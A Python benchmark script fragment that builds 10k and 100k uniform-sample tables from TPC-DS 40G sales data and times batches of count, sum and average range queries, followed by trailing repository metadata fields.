"ws_wholesale_cost,ws_list_price,ws_sales_price,ws_ext_discount_amt,ws_ext_sales_price,ws_ext_wholesale_cost," +
"ws_ext_list_price,ws_ext_tax,ws_coupon_amt,ws_ext_ship_cost,ws_net_paid,ws_net_paid_inc_tax," +
"ws_net_paid_inc_ship,ws_net_paid_inc_ship_tax,ws_net_profit")
sqlExecutor.execute(
"create table tpcds40g_websales_10k_ws_quantity_ws_sales_price(ws_quantity real, ws_sales_price real) from '/data/tpcds/40G/web_sales.dat' method uniform size 10000")
# 100k
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_quantity_ss_sales_price(ss_quantity real, ss_sales_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_quantity_ss_net_profit(ss_quantity real, ss_net_profit real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_list_price_ss_quantity(ss_list_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_list_price_ss_list_price(ss_list_price real, ss_list_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt(ss_list_price real, ss_coupon_amt real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost(ss_list_price real, ss_wholesale_cost real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity(ss_ext_discount_amt real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity(ss_ext_sales_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity(ss_ext_list_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_ext_tax_ss_quantity(ss_ext_tax real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_net_paid_ss_quantity(ss_net_paid real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity(ss_net_paid_inc_tax real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.execute(
"create table tpcds40g_storesales_100k_ss_net_profit_ss_quantity(ss_net_profit real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 100000")
sqlExecutor.set_table_headers(
"ws_sold_date_sk,ws_sold_time_sk,ws_ship_date_sk,ws_item_sk,ws_bill_customer_sk,ws_bill_cdemo_sk," +
"ws_bill_hdemo_sk,ws_bill_addr_sk,ws_ship_customer_sk,ws_ship_cdemo_sk,ws_ship_hdemo_sk,ws_ship_addr_sk," +
"ws_web_page_sk,ws_web_site_sk,ws_ship_mode_sk,ws_warehouse_sk,ws_promo_sk,ws_order_number,ws_quantity," +
"ws_wholesale_cost,ws_list_price,ws_sales_price,ws_ext_discount_amt,ws_ext_sales_price,ws_ext_wholesale_cost," +
"ws_ext_list_price,ws_ext_tax,ws_coupon_amt,ws_ext_ship_cost,ws_net_paid,ws_net_paid_inc_tax," +
"ws_net_paid_inc_ship,ws_net_paid_inc_ship_tax,ws_net_profit")
sqlExecutor.execute(
"create table tpcds40g_websales_100k_ws_quantity_ws_sales_price(ws_quantity real, ws_sales_price real) from '/data/tpcds/40G/web_sales.dat' method uniform size 100000")
def run_10k(sqlExecutor):
sums = [
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price where ss_sales_price between 50.00 and 100.00",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price where ss_sales_price between 100.00 and 150.00",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price where ss_sales_price between 150.00 and 200.00",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_net_profit where ss_net_profit between 0 and 2000",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_net_profit where ss_net_profit between 150 and 3000",
"select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_net_profit where ss_net_profit between 50 and 25000", ]
counts = [
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 1 and 20",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 21 and 40",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 41 and 60",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 61 and 80",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 81 and 100",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 0 and 5",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 6 and 10",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 11 and 15",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 16 and 20",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 21 and 25",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 26 and 30",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 90 and 100",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 70 and 80",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 80 and 90",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 100 and 110",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 110 and 120",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 120 and 130",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 7000 and 8000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 8000 and 9000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 9000 and 10000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 10000 and 11000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 11000 and 12000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 12000 and 13000",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 10 and 30",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 20 and 40",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 30 and 50",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 40 and 60",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 50 and 70",
"select count(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 60 and 80",
]
avgs = [
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_list_price) from tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_tax) from tpcds40g_storesales_10k_ss_ext_tax_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_paid) from tpcds40g_storesales_10k_ss_net_paid_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_profit) from tpcds40g_storesales_10k_ss_net_profit_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 0 and 5",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 6 and 10",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 11 and 15",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 16 and 20",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 21 and 25",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_quantity where ss_quantity between 26 and 30",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 90 and 100",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 70 and 80",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 80 and 90",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 100 and 110",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 110 and 120",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_list_price where ss_list_price between 120 and 130",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 7000 and 8000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 8000 and 9000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 9000 and 10000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 10000 and 11000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 11000 and 12000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 12000 and 13000",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 10 and 30",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 20 and 40",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 30 and 50",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 40 and 60",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 50 and 70",
"select avg(ss_list_price) from tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 60 and 80",
"select avg(ws_quantity) from tpcds40g_websales_10k_ws_quantity_ws_sales_price where ws_sales_price between 100.00 and 150.00",
"select avg(ws_quantity) from tpcds40g_websales_10k_ws_quantity_ws_sales_price where ws_sales_price between 50.00 and 100.00",
"select avg(ws_quantity) from tpcds40g_websales_10k_ws_quantity_ws_sales_price where ws_sales_price between 150.00 and 200.00",
]
# counts
pres = []
ts = []
for query in counts:
# print(query)
p, t = sqlExecutor.execute(query)
pres.append(p)
ts.append(t)
print("counts", pres)
print("time", ts)
# sums
pres = []
ts = []
for query in sums:
p, t = sqlExecutor.execute(query)
pres.append(p)
ts.append(t)
print("sums", pres)
print("time", ts)
# avgs
pres = []
ts = []
for query in avgs:
p, t = sqlExecutor.execute(query)
pres.append(p)
ts.append(t)
print("avgs", pres)
print("time", ts)
def run_100k(sqlExecutor):
sums = [
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_sales_price where ss_sales_price between 50.00 and 100.00",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_sales_price where ss_sales_price between 100.00 and 150.00",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_sales_price where ss_sales_price between 150.00 and 200.00",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_net_profit where ss_net_profit between 0 and 2000",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_net_profit where ss_net_profit between 150 and 3000",
"select sum(ss_quantity) from tpcds40g_storesales_100k_ss_quantity_ss_net_profit where ss_net_profit between 50 and 25000", ]
counts = [
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 1 and 20",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 21 and 40",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 41 and 60",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 61 and 80",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 81 and 100",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 0 and 5",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 6 and 10",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 11 and 15",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 16 and 20",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 21 and 25",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 26 and 30",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 90 and 100",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 70 and 80",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 80 and 90",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 100 and 110",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 110 and 120",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 120 and 130",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 7000 and 8000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 8000 and 9000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 9000 and 10000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 10000 and 11000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 11000 and 12000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 12000 and 13000",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 10 and 30",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 20 and 40",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 30 and 50",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 40 and 60",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 50 and 70",
"select count(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 60 and 80",
]
avgs = [
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_discount_amt) from tpcds40g_storesales_100k_ss_ext_discount_amt_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_sales_price) from tpcds40g_storesales_100k_ss_ext_sales_price_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_list_price) from tpcds40g_storesales_100k_ss_ext_list_price_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_ext_tax) from tpcds40g_storesales_100k_ss_ext_tax_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_paid) from tpcds40g_storesales_100k_ss_net_paid_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_paid_inc_tax) from tpcds40g_storesales_100k_ss_net_paid_inc_tax_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 1 and 20",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 21 and 40",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 41 and 60",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 61 and 80",
"select avg(ss_net_profit) from tpcds40g_storesales_100k_ss_net_profit_ss_quantity where ss_quantity between 81 and 100",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 0 and 5",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 6 and 10",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 11 and 15",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 16 and 20",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 21 and 25",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_quantity where ss_quantity between 26 and 30",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 90 and 100",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 70 and 80",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 80 and 90",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 100 and 110",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 110 and 120",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_list_price where ss_list_price between 120 and 130",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 7000 and 8000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 8000 and 9000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 9000 and 10000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 10000 and 11000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 11000 and 12000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_coupon_amt where ss_coupon_amt between 12000 and 13000",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 10 and 30",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 20 and 40",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 30 and 50",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 40 and 60",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 50 and 70",
"select avg(ss_list_price) from tpcds40g_storesales_100k_ss_list_price_ss_wholesale_cost where ss_wholesale_cost between 60 and 80",
"select avg(ws_quantity) from tpcds40g_websales_100k_ws_quantity_ws_sales_price where ws_sales_price between 100.00 and 150.00",
"select avg(ws_quantity) from tpcds40g_websales_100k_ws_quantity_ws_sales_price where ws_sales_price between 50.00 and 100.00",
"select avg(ws_quantity) from tpcds40g_websales_100k_ws_quantity_ws_sales_price where ws_sales_price between 150.00 and 200.00",
]
# counts
pres = []
ts = []
for query in counts:
p, t = sqlExecutor.execute(query)
pres.append(p)
ts.append(t)
print("counts", pres)
print("time", ts)
# sums
pres = []
ts = []
for query in sums:
p, t = sqlExecutor.execute(query)
pres.append(p)
ts.append(t)
print("sums", pres)
print("time", ts)
# avgs
pres = []
ts = []
for query in avgs:
p, t = sqlExecutor.execute(query)
pres.append(p)
ts.append(t)
print("avgs", pres)
print("time", ts)
if __name__ == "__main__":
run()
| 99.958225
| 190
| 0.764157
| 5,876
| 38,284
| 4.497617
| 0.025187
| 0.10557
| 0.116959
| 0.128727
| 0.980324
| 0.97847
| 0.976427
| 0.976427
| 0.976162
| 0.975026
| 0
| 0.073401
| 0.187572
| 38,284
| 382
| 191
| 100.219895
| 0.776292
| 0.02262
| 0
| 0.284866
| 0
| 0.083086
| 0.85806
| 0.405658
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011869
| false
| 0
| 0.002967
| 0
| 0.014837
| 0.035608
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4ac66bc7f9e41dc14dc5596af385e503cbba9e57
| 1,557
|
py
|
Python
|
.circleci/cimodel/data/simple/docker_definitions.py
|
wenhaopeter/read_pytorch_code
|
491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | null | null | null |
.circleci/cimodel/data/simple/docker_definitions.py
|
wenhaopeter/read_pytorch_code
|
491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | null | null | null |
.circleci/cimodel/data/simple/docker_definitions.py
|
wenhaopeter/read_pytorch_code
|
